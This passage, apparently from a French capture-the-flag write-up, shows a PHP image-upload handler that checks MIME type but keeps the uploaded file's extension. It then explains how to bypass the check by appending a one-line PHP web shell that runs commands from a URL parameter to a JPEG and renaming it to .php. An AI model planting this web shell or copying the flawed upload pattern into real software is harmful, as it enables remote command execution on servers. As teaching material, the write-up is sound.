$finfo = finfo_open(FILEINFO_MIME_TYPE);\n $mime = finfo_file($finfo, $_FILES['image']['tmp_name']);\n finfo_close($finfo);\n\n if (!in_array($mime, ['image\/png', 'image\/jpeg'])) {\n die(\"Only PNG or JPEG allowed\");\n }\n\n $ext = pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION);\n $imageName = uniqid() . \".\" . $ext;\n move_uploaded_file($_FILES['image']['tmp_name'], $UPLOAD_DIR . $imageName);\n }<\/code><\/pre>\n\n\n\nComment bypass le MIME\u00a0?<\/p>\n\n\n\n
Si vous avez suivis, le MIME v\u00e9rifie une partie du contenu de l\u2019image et dit \u00ab\u00a0Ok c\u2019est du binaire JPEG, je laisse passer\u00a0\u00bb. A partir de l\u00e0, on se dit que l\u2019on va cacher du code PHP dans une image.<\/p>\n\n\n\n
1er<\/sup> \u00e9tape\u00a0: On t\u00e9l\u00e9charge une image<\/p>\n\n\n\n2eme \u00e9tapes : On ins\u00e8re le code \u00e0 la suite de l\u2019image
<\/p>\n\n\n\n
On commence par un code simple, voir si le serveur web va ex\u00e9cuter notre fichier\u00a0:<\/p>\n\n\n\n
echo '<?php system($_GET[\"cmd\"]); ?>' >> cat.jpeg<\/code><\/pre>\n\n\n\nPuis renommer votre image en .php, car le serveur web doit l\u2019interpr\u00e9ter comme du php, pas du jpeg.<\/p>\n\n\n\n
![\"\"](\"https:\/\/www.l.ctf.arrobe.fr\/wp-content\/uploads\/2026\/03\/image.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.l.ctf.arrobe.fr\/wp-content\/uploads\/2026\/03\/image-1.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.l.ctf.arrobe.fr\/wp-content\/uploads\/2026\/03\/image-2.png\")
<\/figure>\n","protected":false},"excerpt":{"rendered":"